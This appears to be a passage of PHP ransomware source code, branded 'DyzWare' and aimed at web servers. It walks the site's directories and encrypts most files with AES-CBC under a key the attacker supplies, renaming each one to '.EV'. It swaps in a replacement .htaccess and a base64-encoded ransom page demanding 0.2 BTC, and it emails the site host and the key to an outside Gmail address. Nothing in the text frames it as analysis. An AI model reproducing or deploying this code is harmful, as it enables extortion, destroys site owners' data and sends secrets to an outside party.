.htaccess (Default Page)
'; } if(file_put_contents("EV.php", base64_decode("PGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Mb2NrZWQuPC90aXRsZT4NCjxtZXRhIHByb3BlcnR5PSJvZzp0aXRsZSIgY29udGVudD0iSGFja2VkLCBUZXN0ZWQsIERlZmFjZSI+DQo8bWV0YSBjaGFyc2V0PSJVVEYtOCI+DQo8L2hlYWQ+DQo8Ym9keT4NCjxzdHlsZT5ib2R5e292ZXJmbG93OmhpZGRlbjtiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrfQ0KI3F7Zm9udDo0MHB4IGNvdXJpZXINCm5ldztjb2xvcjp3aGl0ZTt9DQojZntmb250OjIwcHggY291cmllcg0KbmV3O2NvbG9yOndoaXRlO30NCjwvc3R5bGU+DQo8Y2VudGVyPg0KPGZvbnQgY29sb3I9Z3JlZW4+DQo8cHJlPg0KDQogICAgICAgICAgICAuLSIiLS4NCiAgICAgICAgICAgLyAuLS0uIFwNCiAgICAgICAgICAvIC8gICAgXCBcDQogICAgICAgICAgfCB8ICAgIHwgfA0KICAgICAgICAgIHwgfC4tIiItLnwNCiAgICAgICAgIC8vL2AuOjo6Oi5gXA0KICAgICAgICAgfHx8IDo6LyAgXDo6IDsNCiAgICAgICAgIHx8OyA6OlxfXy86OiA7DQogICAgICAgICBcXFwgJzo6OjonIC8NCiAgIEVWICBgPSc6LS4uLSdgDQoJSGFja2VkIEJ5IE5vTmFtZVVzZXINCjwvZm9udD4NCjxmb250IGNvbG9yPSJncmVlbiI+DQpQYXltZW50IDAuMiBCVEM8L2ZvbnQ+PGZvbnQgY29sb3I9ImdyZWVuIj49PC9mb250Pjxmb250IGNvbG9yPSJyZWQiPkNPREUgQlRDTVU8L2ZvbnQ+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo8Zm9udCBjb2xvcj0iZ3JlZW4iPkJ1eSBCaXRjb2luIDxhIGhyZWY9Imh0dHBzOi8vd3d3LmJpdGNvaW4uY29tIj5IZXJlPC9hPjxicj4NCkVtYWlsIDogZW1haWxtdQ0KPC9wcmU+DQo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBzdHlsZT0iIHRleHQtYWxpZ246IGNlbnRlcjsiPg0KICAgICAgPGxhYmVsPktleSA6IDwvbGFiZWw+DQogICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ia2V5IiBjbGFzcz0iaW5wdXRlIiBwbGFjZWhvbGRlcj0iIj4NCjxidXR0b24gdHlwZT0icmVzZXQiPlVOTE9DSyBTSVRFPC9idXR0b24+DQo8YnI+DQo8c3BhbiBpZD0id2FrdHUiPjEwMDAwMDAwPC9zcGFuPiBTDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQp2YXIgd2FrdHUgPSAxMDAwMDAwOw0Kc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQp3YWt0dS0tOw0KaWYod2FrdHUgPCAwKSB7DQp3aW5kb3cubG9jYXRpb24gPSAnaHR0cHM6Ly9lcnJvcnZpb2xlbmNlLmNvbSc7DQp9ZWxzZXsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ3YWt0dSIpLmlubmVySFRNTCA9IHdha3R1Ow0KfQ0KfSwgMTAwMCk7DQo8L3NjcmlwdD4NCjwvaGVhZD4NCjxlbWJlZCBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi82YkRBcWFaR1hIdyZhdXRvcGxheT0xIiB0eXBlPSJhcHBsaWNhdGlvbi94LXNob2Nrd2F2ZS1mbGFzaCJ3bW9kZT0idHJhbnNwYXJlbnQiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvZW1iZWQ+DQo8L2Zvcm0+DQo8L2ZvbnQ+DQo8L2JvZHk+DQo8L2h0bWw+"))){ echo ' EV.php (Default Page)
'; } } } public function shcpackUnstall(){ if( file_exists(".htaEV") ){ if( unlink(".htaccess") && unlink("EV.php") ){ echo ' .htaccess (Default Page)
'; echo ' EV.php (Default Page)
'; } rename(".htaEV", ".htaccess"); } } public function plus(){ flush(); ob_flush(); } public function locate(){ return getcwd(); } public function shcdirs($dir,$method,$key){ switch ($method) { case '1': deRanSomeware::shcpackInstall(); break; case '2': deRanSomeware::shcpackUnstall(); break; } foreach(scandir($dir) as $d) { if($d!='.' && $d!='..') { $locate = $dir.DIRECTORY_SEPARATOR.$d; if(!is_dir($locate)){ if( deRanSomeware::kecuali($locate,".php") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,"404.php") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,".lndex.php") && deRanSomeware::kecuali($locate,"DyzW4re.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htaDyzW4re") && deRanSomeware::kecuali($locate,".lol.php") ){ switch ($method) { case '1': deRanSomeware::shcEnCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"1"); break; case '2': deRanSomeware::shcDeCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"2"); break; } } }else{ deRanSomeware::shcdirs($locate,$method,$key); } } deRanSomeware::plus(); } deRanSomeware::report($key); } public function report($key){ $message.= "========= DyzWare =========\n"; $message.= "Website : ".$_SERVER['HTTP_HOST']; $message.= "Key : ".$key; $message.= "========= (2017) DyzWare =========\n"; $subject = "Report DyzWare"; $headers = "From: DyzWare \r\n"; mail("-- htaccess12@gmail.com --",$subject,$message,$headers); } public function shcEnDesDirS($locate,$method){ switch ($method) { case '1': rename($locate, $locate.".EV"); break; case '2': $locates = str_replace(".EV", "", $locate); rename($locate, $locates); break; } } public function shcEnCry($key,$locate){ $data = file_get_contents($locate); $iv = mcrypt_create_iv( mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM ); $encrypted = base64_encode( $iv . mcrypt_encrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv ) ); if(file_put_contents($locate, $encrypted )){ echo ' Locked (Success) | '.$locate.'
'; }else{ echo ' Locked (Failed) | '.$locate.'
'; } } public function shcDeCry($key,$locate){ $data = base64_decode( file_get_contents($locate) ); $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)); $decrypted = rtrim( mcrypt_decrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv ), "\0" ); if(file_put_contents($locate, $decrypted )){ echo ' Unlock (Success) | '.$locate.'
'; }else{ echo ' Unlock (Failed) | '.$locate.'
'; } } public function kecuali($ext,$name){ $re = "/({$name})/"; preg_match($re, $ext, $matches); if($matches[1]){ return false; } return true; } } if($_POST['submit']){ switch ($_POST['method']) { case '1': deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']); break; case '2': deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']); break; } }else{ ?>

            .-""-.
           / .--. \
          / /    \ \
          | |    | |
          | |.-""-.|
         ///`.::::.`\
        ||| ::/  \:: ;
        ||; ::\__/:: ;
         \\\ '::::' /
   EV  `=':-..-'`
        
		NoNameUser
	      -[ Payment 0.2 BTC=CODE BTCMU ]-
----------------------------------------------
Buy Bitcoin Here